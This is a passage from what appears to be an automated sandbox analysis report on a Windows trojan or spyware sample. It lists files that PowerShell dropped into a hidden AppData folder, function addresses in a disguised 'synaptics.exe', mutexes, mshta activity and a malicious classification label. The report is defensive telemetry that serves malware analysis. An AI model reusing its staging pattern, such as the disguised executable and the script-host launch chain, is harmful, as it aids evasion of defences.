                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\mmapfile.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmondata.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cast.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF12E7024_2_6BF12E70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF3233024_2_6BF32330
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64A8024_2_6BF64A80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6BE7024_2_6BF6BE70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6226024_2_6BF62260
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF82EF024_2_6BF82EF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF865B024_2_6BF865B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF85FA124_2_6BF85FA1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF8229024_2_6BF82290
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF8348024_2_6BF83480
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF84B2024_2_6BF84B20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFA301024_2_6BFA3010
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFC1F4024_2_6BFC1F40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFC243024_2_6BFC2430
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFD416024_2_6BFD4160
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFD3F6024_2_6BFD3F60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFD2F8024_2_6BFD2F80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE1E7024_2_6BFE1E70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE20F024_2_6BFE20F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE267024_2_6BFE2670
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE1D4024_2_6BFE1D40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE23B024_2_6BFE23B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFF204024_2_6BFF2040
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFF1D1024_2_6BFF1D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C001FB024_2_6C001FB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C031D1024_2_6C031D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0322A024_2_6C0322A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C05215024_2_6C052150
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C06201024_2_6C062010
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0ADC6024_2_6C0ADC60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C168E0024_2_6C168E00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0CD84024_2_6C0CD840
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0DC5D024_2_6C0DC5D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C13B28024_2_6C13B280
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C10CC1024_2_6C10CC10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C197C0024_2_6C197C00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16BC3024_2_6C16BC30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C14BC4024_2_6C14BC40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C125C9024_2_6C125C90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0DDCA024_2_6C0DDCA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C181CA024_2_6C181CA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C156D8024_2_6C156D80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C183DF024_2_6C183DF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16FE6024_2_6C16FE60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16EEE024_2_6C16EEE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C158F1024_2_6C158F10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0D9F0024_2_6C0D9F00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0EBF6024_2_6C0EBF60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C172F6024_2_6C172F60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C132F8024_2_6C132F80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C123FB024_2_6C123FB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17FFE024_2_6C17FFE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C193FE024_2_6C193FE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0DE80024_2_6C0DE800
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0D582024_2_6C0D5820
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16882024_2_6C168820
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0E683024_2_6C0E6830
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C10E8D024_2_6C10E8D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1968D024_2_6C1968D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1918E024_2_6C1918E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C12A91024_2_6C12A910
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C11890024_2_6C118900
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C18F90024_2_6C18F900
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C13592024_2_6C135920
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0C699A24_2_6C0C699A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0E099024_2_6C0E0990
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F99A024_2_6C0F99A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0C8A9024_2_6C0C8A90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C195B2024_2_6C195B20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0C5B4024_2_6C0C5B40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C188BB024_2_6C188BB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C129BF024_2_6C129BF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1524A024_2_6C1524A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1984A024_2_6C1984A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0CE4F024_2_6C0CE4F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0E759024_2_6C0E7590
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16E5B024_2_6C16E5B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C18B5B024_2_6C18B5B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0C35C024_2_6C0C35C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0C85D024_2_6C0C85D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0EB60024_2_6C0EB600
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17D67024_2_6C17D670
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5FDD7027_2_6C5FDD70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C58563027_2_6C585630
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C584C0027_2_6C584C00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C590CA027_2_6C590CA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C57EDE027_2_6C57EDE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C57AE5027_2_6C57AE50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C57CE1027_2_6C57CE10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5EAED027_2_6C5EAED0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C533AD027_2_6C533AD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5334F027_2_6C5334F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5814B027_2_6C5814B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C57861027_2_6C578610
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C60270027_2_6C602700
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C58F7F027_2_6C58F7F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C6407D027_2_6C6407D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C61D1D027_2_6C61D1D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C60222027_2_6C602220
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5A528027_2_6C5A5280
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C58836027_2_6C588360
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC157027_2_6EEC1570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC2C5027_2_6EEC2C50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC157027_2_6EEC1570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC313027_2_6EEC3130
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC231027_2_6EEC2310
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F561D4827_2_6F561D48
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F55E99027_2_6F55E990
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F571AE727_2_6F571AE7
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F582A7027_2_6F582A70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F5824D027_2_6F5824D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F70167027_2_6F701670
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F7B7027_2_6F7F7B70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FAF2F27_2_6F7FAF2F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FAF1E27_2_6F7FAF1E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FAF0D27_2_6F7FAF0D
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F803F0027_2_6F803F00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F80176027_2_6F801760
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F719027_2_6F7F7190
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F5B9027_2_6F7F5B90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FB38B27_2_6F7FB38B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F426027_2_6F7F4260
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F404027_2_6F7F4040
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8038C027_2_6F8038C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F541527_2_6F7F5415
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8036F027_2_6F8036F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FAEFC27_2_6F7FAEFC
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FAAE027_2_6F7FAAE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F4ED027_2_6F7F4ED0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7FA8B027_2_6F7FA8B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7F94A027_2_6F7F94A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F802E7027_2_6F802E70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82219027_2_6F822190
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82579B27_2_6F82579B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8276B027_2_6F8276B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8225B027_2_6F8225B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F824BC027_2_6F824BC0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F822F1027_2_6F822F10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82874C27_2_6F82874C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82345027_2_6F823450
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82466027_2_6F824660
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841BD127_2_6F841BD1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F850A0027_2_6F850A00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8489E027_2_6F8489E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84137A27_2_6F84137A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84A31027_2_6F84A310
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8410CD27_2_6F8410CD
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84DF7027_2_6F84DF70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F891A3027_2_6F891A30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8997F027_2_6F8997F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841DC527_2_6F841DC5
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8412A327_2_6F8412A3
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841E2E27_2_6F841E2E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F9119C027_2_6F9119C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AC83A427_2_73AC83A4
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AC31B027_2_73AC31B0
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pyd E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pyd B682E9E8152036BDEBF4CA5410D3C0F88FA3272A969830F63C7B61BB1F0DA89F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C6157C0 appears 191 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C616B50 appears 224 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C6485D0 appears 65 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C616B30 appears 162 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C0C83E0 appears 44 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C555FA0 appears 59 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C0C84F0 appears 184 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C0C92B0 appears 151 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C582B20 appears 59 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C615850 appears 50 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F841398 appears 276 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C59EA40 appears 40 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F553170 appears 109 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6BF4A230 appears 53 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F89CC5A appears 55 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C63C540 appears 76 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F553240 appears 42 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C5F8FE0 appears 58 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F553110 appears 46 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6F89CB7C appears 317 times
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: String function: 6C526DD0 appears 112 times
                Source: unicodedata.pyd.14.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: _overlapped.pyd.14.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: _testbuffer.pyd.14.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@88/1792@20/5
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4A230 ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,_Py_NoneStruct,_Py_BuildValue_SizeT,LocalFree,PyErr_SetObject,_Py_Dealloc,24_2_6BF4A230
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6952A _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CertOpenSystemStoreW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,_Py_NewReference,PyLong_FromVoidPtr,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,24_2_6BF6952A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4ABB0 ?PyWinObject_FreeResourceIdA@@YAXPAD@Z,PyMem_Free,24_2_6BF4ABB0
                Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51z2ks23.h2q.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
